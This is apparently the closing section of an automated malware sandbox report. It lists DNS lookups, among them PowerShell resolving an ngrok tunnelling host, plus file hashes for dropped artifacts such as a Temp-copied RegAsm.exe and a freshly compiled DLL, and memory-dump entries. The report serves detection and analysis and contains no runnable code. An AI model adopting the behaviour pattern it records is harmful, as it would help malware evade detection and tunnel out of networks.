        • 8.8.8.8:53
          26.35.223.20.in-addr.arpa
          dns
          71 B
          157 B
          1
          1

          DNS Request

          26.35.223.20.in-addr.arpa

        • 8.8.8.8:53
          empty.ngrok.io
          dns
          powershell.exe
          60 B
          156 B
          1
          1

          DNS Request

          empty.ngrok.io

          DNS Response

          18.192.31.165
          3.125.223.134
          3.125.102.39
          18.158.249.75
          3.125.209.94
          3.124.142.205

        • 8.8.8.8:53
          165.31.192.18.in-addr.arpa
          dns
          72 B
          138 B
          1
          1

          DNS Request

          165.31.192.18.in-addr.arpa

        • 8.8.8.8:53
          205.122.19.2.in-addr.arpa
          dns
          71 B
          135 B
          1
          1

          DNS Request

          205.122.19.2.in-addr.arpa

        • 8.8.8.8:53
          tse1.mm.bing.net
          dns
          62 B
          170 B
          1
          1

          DNS Request

          tse1.mm.bing.net

          DNS Response

          150.171.27.10
          150.171.28.10

        • 8.8.8.8:53
          14.227.111.52.in-addr.arpa
          dns
          72 B
          158 B
          1
          1

          DNS Request

          14.227.111.52.in-addr.arpa

        MITRE ATT&CK Enterprise v15

        Replay Monitor

        Loading Replay Monitor...

        Downloads

        • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

          Filesize

          2KB

          MD5

          d85ba6ff808d9e5444a4b369f5bc2730

          SHA1

          31aa9d96590fff6981b315e0b391b575e4c0804a

          SHA256

          84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

          SHA512

          8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

          Filesize

          1KB

          MD5

          fa89610ced3b857417a9b65fb0402e41

          SHA1

          ee770e99f6ec8b3f0a844ba76b74deb270b63238

          SHA256

          d7960dcab0d50d627402bbd443872c1ed5e1a79390b5d6f12ca670f08d3f5a0e

          SHA512

          8e43256e2a3cfdc07684168e14299fa1b5c94223315da4da76a6114e5d65faabbec56a083521c8f019ef817f27d3db8931e2b72938e0bc90654a1c189c51c34b

        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

          Filesize

          1KB

          MD5

          4aaea8e990963328115bd59dee2bcda8

          SHA1

          2d7eed0a0a898811d6a149a4545ab3732477c01a

          SHA256

          d9409a92c971fffde4ef29a4777990224d362ae8d847b583a7bd01b5d80394cc

          SHA512

          de1b4cd2633996f20d8967a55c654c902f94080ba4d002c8d7fd473d077b5c26d4b3c8064a3c69a9485074560f25764225f42aadde352633f96326ee521fbd50

        • C:\Users\Admin\AppData\Local\Temp\RES4E2B.tmp

          Filesize

          1KB

          MD5

          ba0eb3d4f52c43ed2f36a7224cb220df

          SHA1

          0baf09abf1ff745d2802eee38bd8b46e41f90e2f

          SHA256

          608f6bf87003ea960829c823201a0b28aafd9eeb6e2234f463b470401027b043

          SHA512

          4af33885de5266cf4f2be08ff45f4213b566d9c06b60c00004b5f1bdbf2322a7111b5eb036ddf5ee863b817f4d345309e0a7477bff8e93a2237efcff9df52e61

        • C:\Users\Admin\AppData\Local\Temp\RegAsm.exe

          Filesize

          32KB

          MD5

          4b23d0d98c945121994ecde5001cb9ef

          SHA1

          cf72261a20daf6a0035f1a84f5bbd0bb2e4ac1a4

          SHA256

          584290c3553d373d1fa4025dc8be39b616a376cb2bb1fd4730dc29c68f4ccb1c

          SHA512

          20173f542bd9d1d3204f946e697e795b3f5da2610e42b3aafd6fe5bdbfaca1a90f27c9c6701b030b1f013d8f04bec77050c22ea9d63c38dad9af951e4d407636

        • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_2blmw24u.ta3.ps1

          Filesize

          60B

          MD5

          d17fe0a3f47be24a6453e9ef58c94641

          SHA1

          6ab83620379fc69f80c0242105ddffd7d98d5d9d

          SHA256

          96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

          SHA512

          5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

        • C:\Users\Admin\AppData\Local\Temp\ghxwalv4\ghxwalv4.dll

          Filesize

          4KB

          MD5

          29950085d6467a80ed9287d2083fe6e6

          SHA1

          566d81fdb4f531535a408e61fcdb83a376b83901

          SHA256

          daf38fe0b580308e904397226fdadedb5d683f24524dba5f69438bcaea6d99d4

          SHA512

          87dd0c6f2d9303d71353f2eed214bb384488cbef0c45f9562c404aa2c58ca12f4d1a6272e743c906fed2927805f2f52b93454e2e931e2370ae279af3248f85c1

        • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

          Filesize

          6KB

          MD5

          06cf6307ed59c562027f88a77d94b5af

          SHA1

          d06ed867151aee3e996119805c1df42cd7a6f0bf

          SHA256

          98b4b785babe3d1f964a0c5801f76810b88459ebef2ac52ad6d2909b59270030

          SHA512

          414602bef501d2b4268814753949127511db603d0a9725c222560b12d53f9f0eb437449c246fb84f6f252d36ec6e6d5d4f40a43ff819bbdfa4c41ed68b9c529d

        • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

          Filesize

          5KB

          MD5

          d71bf7101b3cafe3d03d3cf6a0857624

          SHA1

          38731b1eccf4452978fc4eeec9b0216db21bcac5

          SHA256

          520607226301df665af93a811b4340b34b11e0d2f2025a4c2af1f24287c0c6f8

          SHA512

          0a3f9ef7976ef4f854e86f86eaaa24819c5436c402d72d54f846035f4fbd60482b511ca2592d2be49b811eab1cc7ecabc7f21e495aa185cf1705f244facc3d92

        • C:\windows\temp\5peqrxtl.inf

          Filesize

          622B

          MD5

          018502ac4a5c24da82f568213428dce1

          SHA1

          7c93907925720916d0cc34f7fb47f30ce4e0c96b

          SHA256

          e736f84e93c335e9067f14027d80b0d79e888b57bc16887de23bb88d315b064e

          SHA512

          acab30b8079223b15aa5c7144ade22eaaed5889163e25fc389a9500c7f7869d71fc550c10f0eed7532cd28e54de8ec07d20ed25af1619d095020c22ce9dbd0fa

        • \??\c:\Users\Admin\AppData\Local\Temp\ghxwalv4\CSC25F5039DC5284001B44FF5D341B366.TMP

          Filesize

          652B

          MD5

          65b74b2d82bd8a82f9c823d355781dd6

          SHA1

          4b1e1f729448b5a98cbbf28a7fad70e9b67c7de6

          SHA256

          b7e738895e021f7a95add36dd39d807986ec86e46fb67ce72a8554fce94f8ae0

          SHA512

          d4939d26d8013ce5e3c1d5e74e0434f2709bb92c135ac7fd194a51009d9c03c292245fe972812a7435c58e6869c6135795eb888ef60a6de83dd96e936e2267a7

        • \??\c:\Users\Admin\AppData\Local\Temp\ghxwalv4\ghxwalv4.0.cs

          Filesize

          2KB

          MD5

          f46493b6076a8ef8cc6c44a52727b2a4

          SHA1

          343c03142c931f1c57edd293deb1c8e53f4e87f0

          SHA256

          2ae921dbdf50779a8ab114a5cfe4b754d060e2b8ea251bed59215631edbd3baf

          SHA512

          263ba35062de9f60bd6482fcb337cc6358374309756bf43a6add5712fcfba15cc6cab698e1ae3b1edc6a1910f9ab34523dadbf9c804fb2034b892223d9aa444a

        • \??\c:\Users\Admin\AppData\Local\Temp\ghxwalv4\ghxwalv4.cmdline

          Filesize

          369B

          MD5

          a5a5e372e1f7b3540d6fac56e5370043

          SHA1

          7d1c2dbc489dea8a3e64d8bc789e626062beff91

          SHA256

          e9324bbd22ac72d32e3e5e2213175839263a26d04e669034764f25cd116d9164

          SHA512

          116cc92f0a9cf5dd81df4769ddbb6c855cde6aeba1c7b97a55716de1ec90e836279c88245b8c0e4c26ef481d02147ca3bca8bc0d291508e1264cd413a856531d

        • memory/1484-67-0x000001A022390000-0x000001A022391000-memory.dmp

          Filesize

          4KB

        • memory/1484-74-0x000001A022390000-0x000001A022391000-memory.dmp

          Filesize

          4KB

        • memory/1484-66-0x000001A022390000-0x000001A022391000-memory.dmp

          Filesize

          4KB

        • memory/1484-65-0x000001A022390000-0x000001A022391000-memory.dmp

          Filesize

          4KB

        • memory/1484-77-0x000001A022390000-0x000001A022391000-memory.dmp

          Filesize

          4KB

        • memory/1484-76-0x000001A022390000-0x000001A022391000-memory.dmp

          Filesize

          4KB

        • memory/1484-75-0x000001A022390000-0x000001A022391000-memory.dmp

          Filesize

          4KB

        • memory/1484-71-0x000001A022390000-0x000001A022391000-memory.dmp

          Filesize

          4KB

        • memory/1484-73-0x000001A022390000-0x000001A022391000-memory.dmp

          Filesize

          4KB

        • memory/1484-72-0x000001A022390000-0x000001A022391000-memory.dmp

          Filesize

          4KB

        • memory/2800-46-0x00000165FA560000-0x00000165FA568000-memory.dmp

          Filesize

          32KB

        • memory/2800-33-0x00000165FA430000-0x00000165FA44C000-memory.dmp

          Filesize

          112KB

        • memory/3100-2-0x00000263B3CD0000-0x00000263B3CF2000-memory.dmp

          Filesize

          136KB

        • memory/3100-13-0x00000263B4290000-0x00000263B4306000-memory.dmp

          Filesize

          472KB

        • memory/3100-12-0x00000263B41C0000-0x00000263B4204000-memory.dmp

          Filesize

          272KB

        • memory/4164-97-0x00000000006E0000-0x00000000006EE000-memory.dmp

          Filesize

          56KB

        We care about your privacy.

        This website stores cookies on your computer. These cookies are used to improve your website experience and provide more personalized services to you, both on this website and through other media. To find out more about the cookies we use, see our Privacy Policy.